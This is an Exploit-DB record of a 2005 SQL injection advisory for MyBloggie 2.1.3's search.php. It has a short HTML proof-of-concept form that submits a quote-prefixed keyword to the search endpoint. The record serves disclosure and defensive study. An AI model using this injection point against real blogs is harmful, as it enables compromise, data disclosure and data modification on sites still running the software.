MyBloggie 2.1.3 - Search.PHP SQL Injection Vulnerability

2005-10-06T00:00:00
ID EDB-ID:26326
Type exploitdb
Reporter trueend5
Modified 2005-10-06T00:00:00

Description

MyBloggie 2.1.3 Search.PHP SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/15017/info

myBloggie is prone to an SQL injection vulnerability. This is due to a lack of sanitization of user-supplied input before passing it on to SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 

<HTML><BODY>
<form
action="http://www.example.com/myBloggie/index.php?mode=search"
method="post" name="search" onsubmit="return
checkForm(this)"><center><input type="text"
name="keyword" size="12" value="'SQLInjection"> <input
type="submit" value="Inject this"></center></form>
</BODY></HTML>